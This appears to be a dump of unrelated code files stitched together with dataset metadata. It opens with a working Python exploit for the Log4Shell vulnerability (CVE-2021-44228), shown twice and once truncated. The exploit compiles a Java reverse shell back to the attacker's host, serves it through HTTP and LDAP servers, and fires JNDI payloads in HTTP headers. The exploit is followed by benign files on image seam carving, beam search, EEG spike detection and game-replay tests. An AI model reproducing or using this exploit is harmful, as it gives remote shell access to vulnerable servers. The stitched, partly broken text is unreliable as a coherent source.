import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="'''+attacker+'''";
int port='''+lport+''';
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}'''
# writing the exploit to Exploit.java file
try:
filehandler = open("Exploit.java", "w")
filehandler.write(shellcode)
filehandler.close()
a=os.system("./jdk1.8.0_181/bin/javac Exploit.java")
print(format_text("[*]" , "Exploit shellcode complete"))
except Exception as e:
print(format_text('[-] Something went wrong',e))
def web_server(WebServerPort):
with TCPServer(("0.0.0.0",int(WebServerPort)),SimpleHTTPRequestHandler) as httpd:
httpd.serve_forever()
def createLdapServer(attacker,web):
command = "jdk1.8.0_181/bin/java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://" + attacker + ":" + web +"/#Exploit"
a = os.system(command)
return a
def exploit(target,attacker):
payload = '${jndi:ldap://'+attacker+':1389/a}'
print(format_text("[!] You can use this payload for checking",payload))
header_dict = {"User-Agent":payload, "X-Api-Version":"${jndi:ldap://x${"+attacker+"}.L4J.0b34rbrwsgg7tnult6qklpxz3.canarytokens.com/a}"}
request = requests.get(target,headers=header_dict)
if request.status_code != 503:
print(format_text("[*] Request Sent",target+" - Status code recieved "+str(request.status_code)))
if __name__ == "__main__":
try:
attacker= sys.argv[1]
web = sys.argv[2]
lport = sys.argv[3]
target = sys.argv[4]
# setting up the things
shellcode(attacker, lport)
print(format_text('[+]','Setting up HTTP server'))
Childprocess0 = multiprocessing.Process(target=web_server,args=(web,))
Childprocess0.start()
print(format_text('[+]','Setting up LDAP server'))
Childprocess1 = multiprocessing.Process(target=createLdapServer, args=(attacker,web,))
Childprocess1.start()
exploit(target,attacker)
except KeyboardInterrupt:
print(format_text("Error","user interupted the program."))
sys.exit(0)
except IndexError:
print(format_text("[!] CVE-2021-44228 Exploit","Usage: main.py <AttackerIP> <WebServerPort> <LPORT> <TargetURL>"))
sys.exit(0)
except Exception as e:
print(format_text("[-]",e))
| #!/usr/bin/env python3
import sys, os
from colorama import Fore, Back, Style
import requests
import multiprocessing
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
def shellcode(attacker , lport):
shellcode ='''import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="'''+attacker+'''";
int port='''+lport+''';
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}'''
# writing the exploit to Exploit.java file
try:
filehandler = open("Exploit.java", "w")
filehandler.write(shellcode)
filehandler.close()
a=os.system("./jdk1.8.0_181/bin/javac Exploit.java")
print(format_text("[*]" , "Exploit shellcode complete"))
except Exception as e:
print(format_text('[-] Something went wrong',e))
def web_server(WebServerPort):
with TCPServer(("0.0.0.0",int(WebServerPort)),SimpleHTTPRequestHandler) as httpd:
httpd.serve_forever()
def createLdapServer(attacker,web):
command = "jdk1.8.0_181/bin/java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://" + attacker + ":" + web +"/#Exploit"
a = os.system(command)
return a
def exploit(target,attacker):
payload = '${jndi:ldap://'+attacker+':1389/a}'
print(format_text("[!] You can use this payload for checking",payload))
header_dict = {"User-Agent":payload, "X-Api-Version":"${jndi:ldap://x${"+attacker+"}.L4J.0b34rbrwsgg7tnult6qklpxz3.canarytokens.com/a}"}
request = requests.get(target,headers=header_dict)
if request.status_code != 503:
print(format_text("[*] Request Sent",target+" - Status code recieved "+str(request.status_code)))
if __name__ == "__main__":
try:
attacker= sys.argv[1]
web = sys.argv[2]
lport = sys.argv[3]
target = sys.argv[4]
# setting up the things
shellcode(attacker, lport)
print(format_text('[+]','Setting up HTTP server'))
Childprocess0 = multiprocessing.Process(target=web_server,args=(web,))
Childprocess0.start()
print(format_text('[+]','Setting up LDAP server'))
Childprocess1 = multiprocessing.Process(target=createLdapServer, args=(attacker,web,))
Childprocess1.start()
exploit(target,attacker)
except KeyboardInterrupt:
print(format_text("Error","user interupted the program."))
sys.exit(0)
except IndexError:
print(format_text("[!] CVE-2021-44228 Exploit","Usage: main.py <AttackerIP> <WebServerPort> <LPORT> <TargetURL>"))
sys.exit(0)
except Exception as e:
print(format_text("[-]",e)) | en | 0.281608 | #!/usr/bin/env python3 import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host=" "; int port= ; String cmd="/bin/sh"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } } # writing the exploit to Exploit.java file #Exploit" # setting up the things | 2.660842 | 3 |
shrink/seam.py | maricatovictor/smart_image_resizer | 0 | 6616673 | <gh_stars>0
import numpy as np
from shrink.energy import get_energy_fn
from numba import jit
@jit(forceobj=True)
def remove_seam(im, boolmask):
h, w = im.shape[:2]
boolmask3c = np.stack([boolmask] * 3, axis=2)
return im[boolmask3c].reshape((h, w - 1, 3))
def get_minimum_seam(im, energy="backward"):
"""
DP algorithm for finding the seam of minimum energy. Code adapted from
https://karthikkaranth.me/blog/implementing-seam-carving-with-python/
"""
h, w = im.shape[:2]
energyfn = get_energy_fn(energy)
M = energyfn(im)
    backtrack = np.zeros_like(M, dtype=np.int64)  # np.int alias was removed in recent NumPy releases
M = populate_matrix(M, backtrack, h, w)
seam_idx, boolmask = find_path_backtracking(M, backtrack, h, w)
return np.array(seam_idx), boolmask
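# Minimal usage sketch (not part of the original module): remove a single
# vertical seam from an image. Assumes `im` is an HxWx3 numpy array, as the
# functions above expect.
def _remove_one_seam_demo(im):
    seam_idx, boolmask = get_minimum_seam(im)  # cheapest seam found by the DP above
    return remove_seam(im, boolmask)           # same image, one pixel narrower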
@jit
def populate_matrix(M, backtrack, h, w):
for i in range(1, h):
for j in range(0, w):
if j == 0:
idx = np.argmin(M[i - 1, j : j + 2])
backtrack[i, j] = idx + j
min_energy = M[i - 1, idx + j]
else:
idx = np.argmin(M[i - 1, j - 1 : j + 2])
backtrack[i, j] = idx + j - 1
min_energy = M[i - 1, idx + j - 1]
M[i, j] += min_energy
return M
def find_path_backtracking(M, backtrack, h, w):
seam_idx = []
    boolmask = np.ones((h, w), dtype=bool)  # np.bool alias was removed in recent NumPy releases
j = np.argmin(M[-1])
for i in range(h - 1, -1, -1):
boolmask[i, j] = False
seam_idx.append(j)
j = backtrack[i, j]
seam_idx.reverse()
    return seam_idx, boolmask
HackerRank/Python/Strings/Text_Wrap.py | TISparta/competitive-programming-solutions | 1 | 6616674 | from textwrap import fill
print(fill(input(),int(input())))
server.py | VidasContadas/api-rest | 0 | 6616675 | # coding=utf-8
from flask import Flask
from pymongo import MongoClient
from bson.json_util import dumps
from settings import DATABASE, DEBUG
app = Flask(__name__)
CL = MongoClient()
@app.route("/api/v1/<collection>", methods=['GET'])
def collection_data(collection):
db = CL[DATABASE]
try:
collection = db[collection]
except Exception as e:
print(e)
raise
cursor = collection.find()
json_data = dumps([item for item in cursor])
return json_data
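# Example request (hypothetical collection name), assuming the app is running
# locally on Flask's default port:
#   curl http://127.0.0.1:5000/api/v1/stories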
if __name__ == "__main__":
app.debug = DEBUG
    app.run()
| en | 0.644078 | # coding=utf-8 | 2.62896 | 3 |
foresee/params/constants.py | HamidM6/foresee | 0 | 6616676 | <reponame>HamidM6/foresee
class Constants:
    epsilon = 0.0000001
code/beam.py | JiwanChung/tapm | 14 | 6616677 | <reponame>JiwanChung/tapm<gh_stars>10-100
# coding=utf-8
# Copyright (c) 2019 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
A general wrapper around models with LM heads to generate sequences
using beam search.
"""
import torch
from torch import nn
from exp import ex
from utils import chunks
class TransformerBeamSearch(nn.Module):
@ex.capture
def __init__(
self,
model,
batch_size,
num_samples,
max_target_len,
min_length=4,
alpha=0,
block_repeating_trigram=True,
):
"""
Attributes:
mask_word_id: token id that corresponds to the mask
"""
super(TransformerBeamSearch, self).__init__()
self.model = model
self.tokenizer = model.tokenizer
tokenizer = self.tokenizer
self.start_token_id = tokenizer.cls_id
self.end_token_id = tokenizer.eos_id
self.pad_token_id = tokenizer.pad_id
self.beam_size = num_samples
self.min_length = min_length
self.max_length = max_target_len
self.block_repeating_trigram = block_repeating_trigram
self.apply_length_penalty = False if alpha == 0 else True
self.alpha = alpha
def init_states(self, batch_size, device):
# State of the beam
self.hypotheses = [[] for _ in range(batch_size)]
self.batch_offset = torch.arange(batch_size, dtype=torch.long).to(device)
self.beam_offset = torch.arange(
0, batch_size * self.beam_size, step=self.beam_size, dtype=torch.long
).to(device)
self.growing_beam = torch.full(
(batch_size * self.beam_size, 1), self.start_token_id, dtype=torch.long
).to(device)
self.topk_log_probabilities = torch.tensor(
[0.0] + [float("-inf")] * (self.beam_size - 1), dtype=torch.float
).repeat(batch_size).to(device)
self.results = {
"predictions": [[] for _ in range(batch_size)],
"scores": [[] for _ in range(batch_size)],
}
self._step = 0
self.is_done = False
def step(self, log_probabilities):
""" Grows the beam by one step. """
self._step += 1
# The batch size changes as some beams finish so we define _B
vocab_size = log_probabilities.size(-1)
_B = log_probabilities.size(0) // self.beam_size
# Multiply each beam probability with the probability of the
# next token (conditioned on the words in the beam).
log_probabilities += self.topk_log_probabilities.view(-1, 1)
log_probabilities = self.enforce_min_length(log_probabilities)
if self.block_repeating_trigram:
log_probabilities = self.remove_repeating_trigrams(log_probabilities, _B)
# Find the `beam_size` (previous_beam + token) combinations with
# the highest score
topk_log_probabilities, topk_ids = torch.topk(
log_probabilities.view(_B, self.beam_size * vocab_size),
self.beam_size,
dim=1,
)
# Apply the length penalty. The +1 accounts for the [EOS] token
# that will be added if the beam ends.
topk_scores = topk_log_probabilities / self.length_penalty()
# Retrieve the corresponding respective beam and token id
# topk_token_ids[i] will be added to topk_beam_ids[i]
        topk_beam_ids = topk_ids // vocab_size  # floor division keeps integer beam indices on all torch versions
topk_token_ids = topk_ids.fmod(vocab_size)
# Retrieve the row index of the surviving beams in the original
# view of the log_probabilities tensor
surviving_beams_rows = (topk_beam_ids + self.beam_offset[:_B].view(-1, 1)).view(
-1
)
# Append the last predictions
self.growing_beam = torch.cat(
[
self.growing_beam.index_select(0, surviving_beams_rows),
topk_token_ids.view(-1, 1),
],
1,
)
# Check if any of the beam searches has ended during this
# growth step. Also if top beam (most probable) has ended
# for one element of the batch.
is_finished = topk_token_ids.eq(self.end_token_id)
is_finished = self.enforce_max_length(is_finished)
is_top_beam_finished = is_finished[:, 0].eq(1)
# Save the finished searches
if is_finished.any():
predictions = self.growing_beam.view(
-1, self.beam_size, self.growing_beam.size(1)
)
for i in range(is_finished.size(0)):
if is_top_beam_finished[i]:
is_finished[i].fill_(1)
finished_hyp = is_finished[i].nonzero().view(-1)
# Store finished hypotheses for this batch.
b = self.batch_offset[i]
for j in finished_hyp:
self.hypotheses[b].append((topk_scores[i, j], predictions[i, j, :]))
# If the batch reached the end, save the best hypotheses
# in terms of length-penalized score.
if is_top_beam_finished[i]:
best_hyp = sorted(
self.hypotheses[b], key=lambda x: x[0], reverse=True
)
best_score, best_prediction = best_hyp[0]
self.results["scores"][b].append(best_score)
self.results["predictions"][b].append(best_prediction)
non_finished = is_top_beam_finished.eq(0).nonzero().view(-1)
if len(non_finished) == 0:
self.is_done = True
# Remove finished batches for the next step.
topk_log_probabilities = topk_log_probabilities.index_select(
0, non_finished
)
self.batch_offset = self.batch_offset.index_select(0, non_finished)
self.growing_beam = predictions.index_select(0, non_finished).view(
-1, self.growing_beam.size(-1)
)
# surviving_beams_rows = surviving_beams_rows.index_select(0, non_finished)
return surviving_beams_rows
def tile(self, x, i):
x = x.unsqueeze(0).repeat(i, *[1 for _ in range(len(x.shape))])
x = x.view(-1, *x.shape[2:]).contiguous()
return x
def forward(self, batch, **kwargs):
# forward pass on the encoder
features, features_merged, keywords, G = self.model.prepare_group(batch)
# grow the beam by generating sequences in an autoregressive way
self.start_token_id = self.model.tokenizer.cls_id
sample_feature = features_merged[list(features.keys())[0]]
device = sample_feature.device
self.batch_size = sample_feature.shape[0]
B = self.batch_size
self.init_states(B, device)
self.growing_beam = torch.full(
(B * self.beam_size, 1), self.start_token_id, dtype=torch.long
).to(device)
for k, v in features_merged.items():
features_merged[k] = self.tile(v, self.beam_size)
keywords = self.tile(keywords, self.beam_size)
for step in range(self.max_length):
decoder_input = self.growing_beam
logit, _, _ = self.model.run_token(
decoder_input,
features_merged, keywords)
logit = logit[:, -1]
log_probabilities = torch.nn.functional.log_softmax(logit, dim=-1)
surviving_beams_rows = self.step(log_probabilities)
if self.is_done:
break
for k, v in features_merged.items():
features_merged[k] = v.index_select(0, surviving_beams_rows)
keywords = keywords.index_select(0, surviving_beams_rows)
hypo = self.results['predictions']
hypo = [self.remove_after_sep(h[0][1:]) for h in hypo] # remove sos, eos
hypo = list(chunks(hypo, 5))
return hypo
def remove_after_sep(self, x):
idx = (x == self.tokenizer.sep_id).nonzero()
if idx.nelement() > 0:
idx = idx[0].item()
return x[:idx + 1]
else:
return x
def remove_repeating_trigrams(self, log_probabilities, _B):
if(self._step + 1 > 3):
for i in range(_B * self.beam_size):
tokens = [t for t in self.growing_beam[i]]
trigrams = [(tokens[i - 1], tokens[i], tokens[i + 1]) for i in range(1, len(tokens) - 1)]
if len(trigrams) > 0:
last_trigram = tuple(trigrams[-1])
if last_trigram in trigrams[:-1]:
log_probabilities[i] = -1e20
return log_probabilities
def enforce_min_length(self, log_probabilities):
if self._step < self.min_length:
log_probabilities[:, self.end_token_id] = -1e20
return log_probabilities
def enforce_max_length(self, is_finished):
if self._step + 1 == self.max_length:
is_finished.fill_(1)
return is_finished
def length_penalty(self):
return ((5.0 + (self._step + 1)) / 6.0) ** self.alpha
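# Rough usage sketch (assumptions: `model` exposes the tokenizer and the
# prepare_group/run_token methods used above, and `batch` comes from this
# project's data loader; the argument values are illustrative only):
#
#   searcher = TransformerBeamSearch(model, batch_size=8, num_samples=5,
#                                    max_target_len=30)
#   hypotheses = searcher(batch)  # list of chunks of token-id tensors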
def tile(x, count, dim=0):
"""
Tiles `x` along dimension `dim` `count` times.
Example:
>> ex = torch.tensor([1,2],[3,4])
>> tile(ex, 2, 0)
torch.Tensor([[1,2],[1,2],[3,4],[3,4]])
"""
perm = list(range(len(x.size())))
if dim != 0:
perm[0], perm[dim] = perm[dim], perm[0]
x = x.permute(perm).contiguous()
out_size = list(x.size())
out_size[0] *= count
batch = x.size(0)
x = (
x.view(batch, -1)
.transpose(0, 1)
.repeat(count, 1)
.transpose(0, 1)
.contiguous()
.view(*out_size)
)
if dim != 0:
x = x.permute(perm).contiguous()
    return x
Statistics/test.py | Dheer08/Algorithms | 0 | 6616678 | <filename>Statistics/test.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import math
t = math.sqrt(2)
print(t)
epycom/event_detection/spike/barkmeier_detector.py | ICRC-BME/epycom | 0 | 6616679 | <reponame>ICRC-BME/epycom
# -*- coding: utf-8 -*-
# Copyright (c) St. Anne's University Hospital in Brno. International Clinical
# Research Center, Biomedical Engineering. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Std imports
# Third party imports
import numpy as np
from scipy.signal import butter, filtfilt, find_peaks
# Local imports
from ...utils.method import Method
def detect_spikes_barkmeier(sig, fs=5000, scale=70, std_coeff=4,
through_search=0.05,
det_thresholds={'LS': 700,
'RS': 700,
'TAMP': 600,
'LD': 0.01,
'RD': 0.01},
filter_spec={'narrow': [20, 50],
'broad': [1, 80]},
win_idx=None):
"""
Python version of Barkmeier's EEG spike detector. {Barkmeier et al. 2011}
Parameters
----------
sig: np.ndarray
1D numpy array of EEG data
fs: int
sampling frequency of the signal
    scale: float
scaling parameter (def=70)
std_coeff: float
z-score threshold for spike detection (def=4)
through_search: float
        extent of the search for spike troughs in s (def=0.05)
det_thresholds: dict
detection thresholds (dictionary)
{'LS':700, # Left slope
'RS':700, # Right slope
'TAMP':600, # Total amplitude
'LD':0.01, # Left duration
'RD':0.01} # Right duration
filter_spec: dict
narrow and broad band filter specifications
{'narrow':[20, 50],
'broad':[1, 80]}
win_idx: int
Statistical window index. This is used when the
function is run in separate windows. Default = None
Returns
-------
output: list
List of tuples with the following structure of detections:
(event_peak, event_amp, left_amp, left_dur, right_amp, right_dur)
"""
    # Create filter coefficients
bh1, ah1 = butter(2, filter_spec['narrow'][0] / (fs / 2), 'highpass')
bl1, al1 = butter(4, filter_spec['narrow'][1] / (fs / 2), 'lowpass')
bh2, ah2 = butter(2, filter_spec['broad'][0] / (fs / 2), 'highpass')
bl2, al2 = butter(4, filter_spec['broad'][1] / (fs / 2), 'lowpass')
output = []
last_idx = -0.005 * fs
# Filter data
fx_narrow = filtfilt(bh1, ah1, sig)
fx_narrow = filtfilt(bl1, al1, fx_narrow)
fx_broad = filtfilt(bh2, ah2, sig)
fx_broad = filtfilt(bl2, al2, fx_broad)
# Scale the data
scale_factor = scale / np.median(np.mean(np.abs(fx_broad)))
fx_broad *= scale_factor
thresh = np.mean(np.abs(fx_narrow)) + std_coeff * np.std(np.abs(fx_narrow))
peak_idxs = np.where(fx_narrow > thresh)[0]
peaks = fx_narrow[peak_idxs]
pis = peak_idxs[find_peaks(peaks)[0]] # Getting the maxima
# Run through peaks and calculate slopes and threshold them
for pi in pis:
# Get correct spike index and voltage
l_idx = int(pi - fs * 0.002)
r_idx = int(pi + fs * 0.002)
if l_idx < 0:
l_idx = 0
if r_idx > len(sig):
r_idx = len(sig)
spike_i = np.argmax(fx_broad[l_idx:r_idx])
spike_i += l_idx
spike_V = fx_broad[spike_i]
# Get the left trough index and voltage
l_idx = spike_i - int(fs * through_search)
if l_idx < 0:
l_idx = 0
if spike_i == l_idx:
continue
left_i = np.argmin(fx_broad[l_idx:spike_i])
left_i += l_idx
left_V = fx_broad[left_i]
        # Get the right trough index and voltage
r_idx = spike_i + int(fs * through_search)
if r_idx < 0:
r_idx = len(sig)
if spike_i == r_idx:
continue
right_i = np.argmin(fx_broad[spike_i:r_idx])
right_i += spike_i
right_V = fx_broad[right_i]
# Get amp, dur and slope of the left halfwave
l_amp = spike_V - left_V
l_dur = (spike_i - left_i) / fs
l_slope = l_amp / l_dur
# Get amp, dur and slope of the right halfwave
r_amp = spike_V - right_V
r_dur = (right_i - spike_i) / fs
r_slope = r_amp / r_dur
# Threshold
if (((l_slope > det_thresholds['LS'] and
r_slope > det_thresholds['RS'] and
l_amp + r_amp > det_thresholds['TAMP'] and
l_dur > det_thresholds['LD'] and
r_dur > det_thresholds['RD'])
or
(l_slope < det_thresholds['LS'] and
r_slope < det_thresholds['RS'] and
l_amp + r_amp < det_thresholds['TAMP'] and
l_dur > det_thresholds['LD'] and
r_dur > det_thresholds['RD']))
and spike_i - last_idx > 0.005):
if win_idx is not None:
output.append((int(spike_i), spike_V,
l_amp, l_dur,
r_amp, r_dur,
win_idx))
else:
output.append((int(spike_i), spike_V,
l_amp, l_dur,
r_amp, r_dur))
last_idx = spike_i
return output
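# Minimal usage sketch (synthetic signal; the values are illustrative only):
#
#   import numpy as np
#   fs = 5000
#   eeg = np.random.randn(60 * fs)  # one minute of noise-like data
#   detections = detect_spikes_barkmeier(eeg, fs=fs)
#   # each detection: (event_peak, event_amp, left_amp, left_dur, right_amp, right_dur)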
class BarkmeierDetector(Method):
algorithm = 'BARKMEIER_DETECTOR'
algorithm_type = 'event'
version = '1.0.0'
dtype = [('event_peak', 'int32'),
('event_amp', 'float32'),
('left_amp', 'float32'),
('left_dur', 'float32'),
('right_amp', 'float32'),
('right_dur', 'float32')]
def __init__(self, **kwargs):
"""
Python version of Barkmeier's EEG spike detector.
{Barkmeier et al. 2011}
Parameters
----------
fs: int
sampling frequency of the signal
        scale: float
scaling parameter (def=70)
        std_coeff: float
z-score threshold for spike detection (def=4)
through_search: float
            extent of the search for spike troughs in s (def=0.05)
det_thresholds: dict
detection thresholds (dictionary)
{'LS':700, # Left slope
'RS':700, # Right slope
'TAMP':600, # Total amplitude
'LD':0.01, # Left duration
'RD':0.01} # Right duration
filter_spec: dict
narrow and broad band filter specifications
{'narrow':[20, 50],
'broad':[1, 80]}
sample_offset: int
Offset which is added to the final detection. This is used when the
function is run in separate windows. Default = 0
"""
        super().__init__(detect_spikes_barkmeier, **kwargs)
carball/tests/stats/rumble_test.py | ZachM10/maybe | 0 | 6616680 | <filename>carball/tests/stats/rumble_test.py
import unittest
from carball.analysis.analysis_manager import AnalysisManager
from carball.tests.utils import run_analysis_test_on_replay, get_raw_replays
from carball.generated.api.stats.extra_mode_stats_pb2 import *
class RumbleTest(unittest.TestCase):
def test_pre_item_goals(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assertTrue(proto_game.game_metadata.goals[0].extra_mode_info.pre_items)
self.assertFalse(proto_game.game_metadata.goals[1].extra_mode_info.pre_items)
self.assertTrue(proto_game.game_metadata.goals[2].extra_mode_info.pre_items)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_PRE_ITEM_GOALS"])
def test_item_goals(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
goals = proto_game.game_metadata.goals
for i in range(5):
self.assertTrue(goals[i].extra_mode_info.scored_with_item)
self.assertEqual(goals[0].extra_mode_info.used_item, GRAVITY_WELL)
self.assertEqual(goals[1].extra_mode_info.used_item, BALL_GRAPPLING_HOOK)
self.assertEqual(goals[2].extra_mode_info.used_item, STRONG_HIT)
self.assertEqual(goals[3].extra_mode_info.used_item, BALL_VELCRO)
self.assertEqual(goals[4].extra_mode_info.used_item, BALL_LASSO)
self.assertFalse(goals[5].extra_mode_info.scored_with_item)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_ITEM_GOALS"])
def test_freeze_vs_spike(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assertNotEqual(proto_game.game_stats.rumble_items[1].frame_number_use, -1)
freeze_stats = next(filter(lambda x: x.item == BALL_FREEZE,
proto_game.players[0].stats.rumble_stats.rumble_items))
self.assertEqual(freeze_stats.used, 1)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_FREEZE_VS_SPIKE"])
def test_hold_time(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
spike_stats = next(filter(lambda x: x.item == BALL_VELCRO,
proto_game.players[0].stats.rumble_stats.rumble_items))
self.assertAlmostEqual(spike_stats.average_hold, 11.87916, 5)
spike_stats = next(filter(lambda x: x.item == BALL_VELCRO,
proto_game.teams[0].stats.rumble_stats.rumble_items))
self.assertAlmostEqual(spike_stats.average_hold, 11.87916, 5)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_HOLD_TIME"])
def test_item_count(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assert_rumble_item_counts(proto_game.players[0].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 1, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 0},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 2, 'unused': 0},
{'item': BALL_VELCRO, 'used': 0, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 1, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[1].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 1},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 0, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 0, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 2, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 1}
])
self.assert_rumble_item_counts(proto_game.players[2].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 1, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 0, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 1, 'unused': 1},
{'item': CAR_SPRING, 'used': 0, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[3].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 0, 'unused': 1},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 1},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 2, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 1, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 2, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[4].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 0, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 1, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[5].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 1, 'unused': 0},
{'item': CAR_SPRING, 'used': 2, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 0, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.teams[0].stats.rumble_stats, [
